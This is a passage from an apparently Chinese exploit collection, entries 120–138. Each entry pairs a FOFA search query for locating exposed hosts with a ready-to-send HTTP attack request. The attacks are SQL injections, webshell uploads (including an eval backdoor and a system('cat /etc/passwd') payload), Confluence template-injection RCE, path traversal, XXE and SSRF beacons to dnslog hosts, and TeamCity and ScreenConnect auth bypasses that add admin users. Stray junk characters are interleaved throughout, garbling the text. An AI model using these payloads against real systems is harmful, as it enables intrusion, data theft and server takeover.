Origin: https://58.18.133.60:8443* n2 V+ I) _: {' P
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
; @' P/ g9 r" D* d) \Sec-Fetch-Dest: empty
- I E" ^: _, H. ?Sec-Fetch-Mode: cors9 m9 a5 V. d) G2 ^
Sec-Fetch-Site: same-origin
9 t, E7 k% q/ J; a# m; e' x- FX-Forwarded-For: 1.1.1.1
; k, v1 e7 m: o7 C0 yX-Originating-Ip: 1.1.1.1" o8 w* W0 o' D! P+ ^
X-Remote-Ip: 1.1.1.1
3 |' ^& v* D. i7 F) w- ]X-Remote-Addr: 1.1.1.1
0 R% }& `. d+ R- y/ NTe: trailers
1 }) k5 S& W i% T: ~Connection: close
`) o8 k8 @) B% G8 `! W# _* u
. l5 f6 f: R; L* {1 F# J/ Ysrc=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|1234563 ~" Y9 i' Q/ ~! w2 Y! U3 X! r5 R" m0 N
7 V) V& [7 X: n$ }4 E; V
0 N+ h4 X9 A8 z) Z120. 北京百绰智能S40管理平台导入web.php任意文件上传. X$ p! z ^) ?0 Q: C. y" ~; Y
CVE-2024-1253# L6 K$ Q' d: S8 j' @
FOFA:title="Smart管理平台"3 P8 T) j/ B9 ]) `+ Y
POST /useratte/web.php? HTTP/1.1
: Y( M# E4 E w. L3 D4 wHost: ip:port, t6 t& f- R$ |! l6 V
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db. l x: b. U% _% Y. K
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko% H/ ?6 |3 ?+ \% Z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.82 }* B" g% Y+ k: V
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
3 G( y/ S7 P' Y- d) p [9 u$ |$ aAccept-Encoding: gzip, deflate
1 |3 x# n. r, V+ u7 r# n1 ]+ ]Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328! Q; f/ T3 i) y2 a* Q
Content-Length: 597
2 L* i! u$ I2 Z' k5 C3 k+ J% _) |8 eOrigin: https://ip:port6 w, \7 D9 P: K G0 q& I v
Referer: https://ip:port/sysmanage/licence.php
- L6 p- `' Y: s* Z, U3 ~. L: QUpgrade-Insecure-Requests: 19 _7 Q7 T U: C: a5 F8 N3 Q3 ~3 t; N
Sec-Fetch-Dest: document
4 C* x' b% \& [# D/ TSec-Fetch-Mode: navigate7 G& X# X. `$ T$ e2 E
Sec-Fetch-Site: same-origin# c# m5 a; O/ Q# o' x9 V: R# I
Sec-Fetch-User: ?1
9 `' F! S$ K; T- M( p* ITe: trailers
* k' N, M& Z! w3 b! ? ?2 OConnection: close
( z, v- p) E5 W6 a: J0 g1 l1 |8 q) a5 r# a% X& o- B# |4 j
-----------------------------423289041236658752706300793281 R% p+ ~$ U) ?& x r$ k3 {
Content-Disposition: form-data; name="file_upload"; filename="2.php"- l( B. a% L$ N: ?9 s% y
Content-Type: application/octet-stream
3 |0 `: T' Q: x3 Z# V0 t, Z- [3 G" P. P' E
<?php phpinfo()?>
5 F! ~% z3 E* a) e% p9 p, T-----------------------------42328904123665875270630079328, w. v" d5 R3 a. e2 S& M! I7 t
Content-Disposition: form-data; name="id_type"
) Z S3 q$ W, `- v- _( M: w8 }$ u9 a; `5 K( S
1
* D: c, a: x' T n, C0 d' G-----------------------------42328904123665875270630079328$ a: m$ I( o& [' j* w6 S/ \1 \
Content-Disposition: form-data; name="1_ck") [: f9 t! L! {( u% e
. U. N, M! Z) _1_radhttp
* M- a5 v0 r/ H. Y# w' A-----------------------------423289041236658752706300793289 Y* u' G( G+ \
Content-Disposition: form-data; name="mode"
( K" ?- Q9 u9 |7 n$ r9 o) } x* k( C7 `
import
; o3 C( o9 ]3 j; S& J! C-----------------------------42328904123665875270630079328
2 v, t4 e+ M4 W1 w
- X; k7 e1 H. h. V2 e G, S6 ~- I) V* ~% n. {7 Y
文件路径/upload/2.php" T. V& e n; |+ U$ @, c
7 V% R+ n; L, g7 i/ H121. 北京百绰智能S42管理平台userattestation.php任意文件上传
" M3 a0 R( [( o1 ^ R0 ZCVE-2024-1918
/ u, X# r: M7 ` tFOFA:title="Smart管理平台"
& L0 \( u. [, T' N. |POST /useratte/userattestation.php HTTP/1.1( @& {5 ]1 p5 ]7 P) _6 o
Host: 192.168.40.130:8443. x" n* h `4 N- N* O
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
3 M4 n% B5 ~! I6 @5 @/ XUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
1 ^$ `. D, {5 T9 d7 G' YAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.89 E! h. Y# D' l; k& M
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2% f3 J* S% |, o7 N9 O$ \
Accept-Encoding: gzip, deflate
. V8 M6 z3 {9 L: p8 R9 a3 ZContent-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328: J$ M% K( g9 m
Content-Length: 592
/ k& D1 A2 y: E2 w5 U3 N' xOrigin: https://192.168.40.130:84431 ?7 e" d, q8 n
Upgrade-Insecure-Requests: 1
$ O! z) Z: U. Q8 k2 v$ ASec-Fetch-Dest: document
0 D1 v) h& M5 Z" ESec-Fetch-Mode: navigate2 b& E# g$ Y$ |5 j! i
Sec-Fetch-Site: same-origin4 ?" U. U- H9 k1 ?6 B4 a
Sec-Fetch-User: ?1 f9 G% ]3 ^% L0 ^% B$ n
Te: trailers2 ]- x9 j# P! S+ M
Connection: close) s! Q, D' D. @, O8 e2 K. n
4 l- g* J B9 p5 w1 `0 c
-----------------------------42328904123665875270630079328
i0 M& ?. {# J! T; j! GContent-Disposition: form-data; name="web_img"; filename="1.php"
" w0 w! U& `, I& V# a w2 a0 oContent-Type: application/octet-stream, j6 s6 @) w1 s$ [7 g' Z
2 S+ n9 I7 C+ u0 N1 H* K! S
<?php phpinfo();?>
" H+ n3 V! o2 A9 y, g. e-----------------------------42328904123665875270630079328
9 ? e( n! o4 i% W* O) e4 I% \Content-Disposition: form-data; name="id_type"
- u% t* J) { o4 ]/ G! L) R# {9 ]6 V( u5 p6 c* ^: \$ d, N
1. _( ]# ^0 f E7 ^' c
-----------------------------42328904123665875270630079328
: L9 c( X" V5 D+ C7 y+ M) KContent-Disposition: form-data; name="1_ck"8 x6 H9 M7 Y- d" @% \
" l: {2 M7 l f9 E& ]8 T# q
1_radhttp6 [1 y+ {8 g0 T* C1 z) u3 O$ Q
-----------------------------42328904123665875270630079328) i% f# ~% R5 e1 {, d0 q
Content-Disposition: form-data; name="hidwel"0 [! X0 x: C+ Q4 M& t
' K9 x" k& T8 Q
set
+ ]) y2 N( l/ V0 S2 Y% R-----------------------------42328904123665875270630079328
* S/ N0 r O) o$ B" _9 G7 }+ N, Q1 M/ Y: u, D1 M) X2 B
3 z/ B& r. k3 e( G6 jboot/web/upload/weblogo/1.php6 m/ D! `- v% g2 [; Z) t/ P" f- Y
2 ~& [. Z5 V/ j. P& @+ [* C122. 北京百绰智能s200管理平台/importexport.php sql注入
* C7 b2 A3 v* |5 TCVE-2024-27718FOFA:title="Smart管理平台"1 i4 z) \5 @4 j' s; i: k! y" l
其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()
: e) `- j d( ZGET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.16 l( H+ n7 A: k- _3 L4 p8 o
Host: x.x.x.x
' b# Q/ v9 o% D$ iCookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc03 r3 Y- D( s% v# p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
4 k; T- l1 O r* v* Y1 [# H" dAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
! y9 T5 K; V3 _2 R$ t6 gAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
$ \: Q/ q9 b( \7 P7 Y, h1 g/ iAccept-Encoding: gzip, deflate, br# F: ]5 R: a1 W6 M4 q" |
Upgrade-Insecure-Requests: 1
& C) \( `' P* x: u( u; RSec-Fetch-Dest: document* E: l! L) ?6 E' z% V
Sec-Fetch-Mode: navigate" ~0 }9 L O5 [1 |
Sec-Fetch-Site: none
) A4 U6 c. }) w4 lSec-Fetch-User: ?1: U0 E) @& @& A
Te: trailers4 I U" h9 V) _2 Z8 Y9 s3 n
Connection: close5 Q% L0 s" {, {5 O' @. V3 s
K- s9 {0 Z4 N4 z6 }5 _0 A
' h& m7 y6 {: G
123. Atlassian Confluence 模板注入代码执行
& G* l( l& X8 SFOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3") W! I7 o* W6 e
POST /template/aui/text-inline.vm HTTP/1.1/ {2 V2 k1 v) _9 W, ?
Host: localhost:8090
0 o/ T( T; n' _# |! V' A# zAccept-Encoding: gzip, deflate, br# Z6 ]/ d( Q7 K. \/ s
Accept: */*( {3 r' ?. T% [* m4 z u5 c
Accept-Language: en-US;q=0.9,en;q=0.8
& X) S0 u0 C8 h& ` V# MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
/ Y) g6 }5 T- PConnection: close
9 k4 a( M3 S& m$ a0 K5 \4 @) OContent-Type: application/x-www-form-urlencoded& x* v6 V2 ?9 b1 v T3 r
, a+ g, k& j* a( S
label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
' d, q) e; [! C4 I: e3 n! q9 J/ x8 s/ @1 J8 Y: ^/ z- ]! C
9 b+ I% J/ s/ |- e3 G
124. 湖南建研工程质量检测系统任意文件上传
P5 ?$ b* I6 b! h2 P7 y& zFOFA:body="/Content/Theme/Standard/webSite/login.css"4 ^( c" P' t$ k" ?# |( P0 t$ ?# P' R: _% s
POST /Scripts/admintool?type=updatefile HTTP/1.11 Q0 i; @+ t7 t; F0 R* i
Host: 192.168.40.130:8282
% m+ M4 ], D' y6 }. U/ v, H+ aUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36/ i. j, l7 h ~* Q6 d* M, e9 x
Content-Length: 72, o4 F$ _& F7 F: `- Y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8( R( E4 _0 c4 m, z
Accept-Encoding: gzip, deflate, br
, a' h4 B& l, M5 s S/ dAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
/ m/ E0 a* d; S" v9 FConnection: close0 H( }& A( B8 E+ R' q- z
Content-Type: application/x-www-form-urlencoded* u7 a' f6 d3 [4 L* R: R0 E$ u
+ O! o* |3 Z9 c$ s6 H! F! jfilePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>
7 S/ u) |3 M9 z" v
8 `) A: G/ s* U9 t0 X$ {8 \0 R* Y/ r$ J; ?& S7 w7 i c, @! Y; g1 k
http://192.168.40.130:8282/Scripts/abcgcg.aspx. T1 \6 G5 i- B! l/ `
! e, {% P. T$ E/ x/ M125. ConnectWise ScreenConnect身份验证绕过
. v% l3 h4 U$ R; HCVE-2024-1709
+ B3 |9 B8 ?( w" {& l# S( rFOFA:icon_hash="-82958153"
/ K4 y2 l j4 V2 q1 X4 a" Jhttps://github.com/watchtowrlabs ... bypass-add-user-poc
5 e' R1 g, D* E8 P% D% i) ^9 M. B
$ r6 C' K2 A) w" Z0 j, D使用方法9 w6 n* ^6 T$ W
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!' u3 q# Y k9 u. Q6 g% |* B% u
. W/ x$ t S- ?# _) k
9 q" [, w7 k9 M+ U$ O, s创建好用户后直接登录后台,可以执行系统命令。
$ }$ ~# m, k$ l( N+ M
, r5 s/ w8 F9 {' E0 G. t126. Aiohttp 路径遍历3 N( p+ j2 T' H% Z% H1 Y8 T
FOFA:title=="ComfyUI"
# F6 B8 X0 b' b8 `$ PGET /static/../../../../../etc/passwd HTTP/1.1
s! q* B0 J) U+ w4 w+ XHost: x.x.x.x
. O7 l0 z5 F- N. `User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.360 W6 s4 Y1 t s
Connection: close& r! h4 J, Q/ M" Q9 t) g! p7 @
Accept: */*6 z* Z: C1 J( p# F
Accept-Language: en8 `: v* c& @! L! q k6 j
Accept-Encoding: gzip
. r$ P0 z9 d0 K
/ K& h% f5 F! c& l1 O: {) m c0 t' P% t% J" O- b0 b+ R
127. 广联达Linkworks DataExchange.ashx XXE
$ x5 n/ t! @3 g- p/ z: ] \FOFA:body="Services/Identification/login.ashx"
5 ~0 s; Q1 q' v& fPOST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
! }8 N" b5 W% VHost: 192.168.40.130:8888" I+ E4 }( }$ E( D2 p% g; {4 ]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
. l: S+ x; ^* y8 C# V( YContent-Length: 415
1 X1 c" O' }. g* ~4 E: V, MAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
/ A3 w. V; K) O) B+ z7 Y h8 }+ _+ @Accept-Encoding: gzip, deflate
4 s% u3 J& Y: X* p0 q2 f" L1 f5 pAccept-Language: zh-CN,zh;q=0.9+ L6 i H, ?. I# Z
Connection: close
" ^' a1 w8 Q) kContent-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
. g$ w: M) @0 r1 ?& WPurpose: prefetch
, T+ ]' u& I% d4 |Sec-Purpose: prefetch;prerender6 p; Q) J' I$ g! K
; E! l( A Q# H% P* {------WebKitFormBoundaryJGgV5l5ta05yAIe0
/ ~5 l' L1 S2 U* l( u5 KContent-Disposition: form-data;name="SystemName"( Z* Z$ z5 q$ ^7 U5 J
2 t4 f2 L+ g. `+ j2 [
BIM; m3 s% u5 j9 Q" O3 `
------WebKitFormBoundaryJGgV5l5ta05yAIe0
: y8 s- Y0 W- @2 D s4 S9 ~( BContent-Disposition: form-data;name="Params"
$ S( e) J% b3 w( F- }- k# ZContent-Type: text/plain
2 o3 k4 G& z* J8 s, a9 k
' L. J$ A; m) ], z0 T5 W<?xml version="1.0" encoding="UTF-8"?>
$ E( P8 K* _2 g2 U: u! H5 v$ c7 C. {<!DOCTYPE test [
# V- {7 H( q. r# a b+ D<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">$ x, k( I7 O) \
]
, s5 A/ r* Q- `5 c7 W, k6 l0 ]: J>
6 u9 X# L, @" [" s) W<test>&t;</test>% \, r: _ \; l8 G- l" E- l
------WebKitFormBoundaryJGgV5l5ta05yAIe0--) x: t- q0 ~7 `8 @# ]) i( h
7 E% n) v5 ^1 j- }% ]/ ~- @
% b& v* L0 ^8 q, m& U' g
+ G4 z% k) ^( j2 G( K( C128. Adobe ColdFusion 反序列化* H6 p3 G7 R7 g" J7 X( f3 w( W' j
CVE-2023-38203, k; A8 V, Z7 u' h2 X/ V5 C4 w
Adobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)
2 s' }" _1 N6 K. {FOFA:app="Adobe-ColdFusion"1 q/ H- C( D6 v/ b" | @/ V
PAYLOAD
, V0 O, f: F. {; p$ U
* G! n9 A0 A2 v/ I- n# a7 ^7 S129. Adobe ColdFusion 任意文件读取
z) |7 ~, D" \, }CVE-2024-207678 D8 n S9 ?6 ?. [ `2 A
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"; i* R% O w7 a( j
第一步,获取uuid; |5 z0 H. C( r. ^2 g5 ~$ o
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.14 m, g) n2 w: X, |* Y
Host: x.x.x.x
8 `9 y- e$ F& `7 Z$ }User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
# u& i1 s0 ]) GAccept: */*
2 p4 r1 T% H: wAccept-Encoding: gzip, deflate; }0 u: n9 {; ^4 ~2 J
Connection: close
, o& L' ]% l9 j, s) F1 }9 V
4 n. v5 F2 ?8 ]9 z% }6 b( v8 k# m3 ~- M$ `
第二步,读取/etc/passwd文件
, A9 m0 [ y" T. w H- Z/ x7 dGET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1; R- X( a# {. D9 R$ u5 |! f; N
Host: x.x.x.x
$ X8 `, g% n! Z& |" A' U9 rUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36: n5 @& ^/ G8 }0 r' }
Accept: */** A4 V* q) r1 W
Accept-Encoding: gzip, deflate
1 K+ W9 w; n( W" q5 o7 MConnection: close
" d0 Y: @5 q' l0 u4 Y& duuid: 85f60018-a654-4410-a783-f81cbd5000b9
# E0 x) c+ t) S. a* y0 P7 v
! [% j' s$ p; p: S
& v7 \) ?1 K' P0 C2 c/ x7 k130. Laykefu客服系统任意文件上传
2 S. v5 ^0 ]8 y5 ?# R' OFOFA:icon_hash="-334624619"* I+ D# m& J# Y7 h5 s4 M/ Y' g+ g$ k
POST /admin/users/upavatar.html HTTP/1.1% D& Y$ R5 G3 f8 r1 Z9 q
Host: 127.0.0.1
4 _3 W! r9 E& i% y! K' SAccept: application/json, text/javascript, */*; q=0.01, j+ b* a5 S( E5 [9 s
X-Requested-With: XMLHttpRequest& }9 o9 B7 |: k5 t# Z
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
2 J' u. ~! T: _6 g! c1 m2 u1 p) b9 oContent-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
8 R9 Y) D1 N: M+ GAccept-Encoding: gzip, deflate/ f# A% B8 @0 M6 v" b
Accept-Language: zh-CN,zh;q=0.99 |; ?/ D& g/ g7 u+ e
Cookie: user_name=1; user_id=3
3 a1 P* y9 F* {7 b8 y* | Z UConnection: close
7 i) y( d- F/ g% s% q6 A1 y- _5 T {, t7 @
------WebKitFormBoundary3OCVBiwBVsNuB2kR6 q: o: n! g) I5 Z
Content-Disposition: form-data; name="file"; filename="1.php"
% ^" V2 K' a/ y% h. K; s9 `( mContent-Type: image/png- c" |' \# G. \# I9 L9 l! A: m
- z0 b8 p3 W* z% P; H2 N2 f$ w
<?php phpinfo();@eval($_POST['sec']);?>2 \, ]8 C/ ?1 k% ]
------WebKitFormBoundary3OCVBiwBVsNuB2kR--4 o* r" P$ E5 S) @
% _7 C V, G* e0 ~# D1 I* ?! B/ T7 [" K7 L" z7 q Y2 l& j
131. Mini-Tmall <=20231017 SQL注入* c% N0 Y! n: X }
FOFA:icon_hash="-2087517259"
% M5 |( c8 e. X4 s$ z7 n后台地址:http://localhost:8080/tmall/admin
& p% ~, B( E8 d$ R* Chttp://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)
1 y- y+ J( |: _' v( N$ d
% U+ x# |$ Z+ s9 \7 V132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
. ] X7 Z: L0 L0 W# l/ p- d/ q1 OCVE-2024-27198
- B4 s: z7 H& DFOFA:body="Log in to TeamCity"! g8 o ?9 B; J k% k5 T4 `- i
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.18 d- I; @! ]$ i# F; v, L
Host: 192.168.40.130:8111
# g" ^5 U( I" C) v: @9 pUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36+ E9 t/ |! i3 l
Accept: */*: D' Y' h' U4 n8 n
Content-Type: application/json E; e8 O5 q; v; `: d- v. X: l
Accept-Encoding: gzip, deflate
. v/ j+ c( \4 l. ]2 v' l
7 _: I( T& r7 r% J2 F9 l# i{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}
# @7 S( h& n$ }$ F, m2 |. b+ c, x( \: @
! `/ V& c. P( ^6 e
CVE-2024-27199: y# x ~% s0 l0 O) B
/res/../admin/diagnostic.jsp: T% ?! a' g9 T: p% j
/.well-known/acme-challenge/../../admin/diagnostic.jsp0 ?+ V4 y0 \6 B
/update/../admin/diagnostic.jsp+ \2 m4 U! o$ N
/ a& r& r/ s+ t$ z! k& ?
8 G) Q' j$ r( X0 UCVE-2024-27198-RCE.py
: G e% G9 K( k8 c1 Q9 J' `/ V1 a9 r; ^" B/ d
133. H5 云商城 file.php 文件上传
& ~# Y6 u" Y3 XFOFA:body="/public/qbsp.php"
/ n' p' c: Y9 v+ E/ z* e5 O/ Q, C0 VPOST /admin/commodtiy/file.php?upload=1 HTTP/1.1; }: V; `4 e" M6 Y, ?# h9 r) B
Host: your-ip. ~ o) D8 q. Y7 V2 ~5 u M; S' x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36: p. X9 y F) H/ r8 d+ |
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx
; K; d' @/ b7 J: ?% O, h# Z
; a0 x7 E' c* b" S------WebKitFormBoundaryFQqYtrIWb8iBxUCx
) \! s2 U z0 L+ PContent-Disposition: form-data; name="file"; filename="rce.php"4 ~3 n2 s* q( r- i
Content-Type: application/octet-stream
4 T3 p9 q: Q0 B+ A 9 M. S! H; L3 h$ r, ]4 N
<?php system("cat /etc/passwd");unlink(__FILE__);?>
) J" ^3 i# H# |0 n0 m% W9 L------WebKitFormBoundaryFQqYtrIWb8iBxUCx--; E5 [4 N* t* I) l8 ~2 T! Y7 p
N7 W9 F! E) S* P2 v9 K% U
; B" t4 j& g5 L- H) B' i" Q+ p0 G
; d% _- N# ~$ O$ }3 n9 @134. 网康NS-ASG应用安全网关index.php sql注入
5 z3 U, ?: D6 s. b. I' [CVE-2024-2330
+ |" R; `- [* s$ @Netentsec NS-ASG Application Security Gateway 6.3版本6 M4 F; p) a3 ]9 i% C7 q5 G
FOFA:app="网康科技-NS-ASG安全网关"- z+ M( t# J/ v4 U* o
POST /protocol/index.php HTTP/1.1
) Z* C& \ y: Z0 y3 zHost: x.x.x.x
" f9 ~6 d2 I$ w+ _Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de8 P4 W- C( n; {6 R' ~
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
; v$ L7 s+ `5 q. G' qAccept: */*/ g' ?4 S" x" ^) k: n1 G
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.20 m' _& x$ s8 x( j, f! Z4 ?
Accept-Encoding: gzip, deflate
0 m$ I8 d( r+ ?$ iSec-Fetch-Dest: empty
6 D5 [5 F* _: @Sec-Fetch-Mode: cors5 j( p/ u6 m2 \+ c9 L1 E
Sec-Fetch-Site: same-origin
- G9 ~/ e9 D' c6 @1 a) I B% e/ ]Te: trailers
, p( i, ?$ a& r1 L) ~Connection: close: {# t) U6 L& H6 s. A
Content-Type: application/x-www-form-urlencoded6 F/ C/ k$ \5 A& G+ D9 c7 n5 N C
Content-Length: 263
1 b9 q2 f7 _$ h/ J- e2 k* A$ ] G3 X/ f. t! z, C
jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}
4 z$ K; u1 q0 y7 U# a$ Q" r: K6 e8 Q
, G. ?2 a+ w2 n
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
: A3 V H! _/ o$ s2 Q1 dCVE-2024-20222 |. z! e( ], T R/ m2 b+ F+ p
Netentsec NS-ASG Application Security Gateway 6.3版本1 Q' X3 t) o) T' o! l4 K
FOFA:app="网康科技-NS-ASG安全网关"4 W% s+ Y% t' ~8 K
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
: L$ `0 t8 | \9 ^' Z+ X$ LHost: x.x.x.x
: `2 o: k6 N# b; D* I7 H8 A/ \- AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
& q( E6 p) Z: ~, U" QAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.70 _/ R$ e# v: H5 a" P; \
Accept-Encoding: gzip, deflate
3 ^3 d) d/ \ tAccept-Language: zh-CN,zh;q=0.9+ d2 W& C% f6 Z# N
Connection: close
) q3 t- \2 C" ^; |' {. }' X# p4 {/ U& G0 r
v0 i! ]9 q- t$ n; {3 A" A
136. NextChat cors SSRF
, ?8 }" L+ R! n2 d/ RCVE-2023-49785
) Q" Q* X @) {7 Q5 R: BFOFA:title="NextChat"0 f& S0 g* C. R" X
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
+ f, X& q5 u0 o! ]Host: x.x.x.x:10000& G3 [6 L7 |2 Q `
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
& _! x: m+ X% L) r) n; SConnection: close
1 }+ h4 E( z0 I! d7 X. I5 ~Accept: */*
& S+ M6 Y/ }8 zAccept-Language: en$ C6 k% @ ]% M1 R h
Accept-Encoding: gzip
9 h' f5 I' j8 t9 ], A7 P( i8 s
& ~# w, A& |- h% Q9 O, d
$ M" g- l* J8 J137. 福建科立迅通信指挥调度平台down_file.php sql注入; d5 h* G, ^: z- m4 j2 d3 f+ @; D
CVE-2024-2620* E X' Q) m7 K1 X: B1 ^
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"6 N5 x& H6 G* `" |3 t) B2 d- Y! E, b
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1/ q0 J, S6 b# t/ A& ?. E
Host: x.x.x.x, O' f' n. c U8 [; ]; T, {
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
) m" ^5 O9 y2 Q8 rAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8( t' Q; }! z' j5 R- ?0 x
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.21 q" M! T' C( N2 c, O$ v
Accept-Encoding: gzip, deflate, br
+ g% a" h- m) k9 J3 P2 QConnection: close
0 J' ?3 |( |9 k' s b& u, U! G XCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj; I: H V- N& ?5 S1 }- q: I
Upgrade-Insecure-Requests: 12 H" M" E; X$ n, h* @( M2 `0 q
6 L3 L' `, p/ m4 c
& c, ~& @9 \% |2 b138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
1 v4 p1 M! h& ~; s* K/ ?CVE-2024-2621
/ O9 B5 g7 B' a6 c8 TFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"- `' d4 p/ J. c; d% F" w- L
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1) e$ [) r9 ^) L0 \8 @/ q
Host: x.x.x.x
4 z& p2 U* @, Z. a* E; P# GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.00 E$ N9 J% A- j1 [
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
6 w7 s5 _7 p! U* Y9 JAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
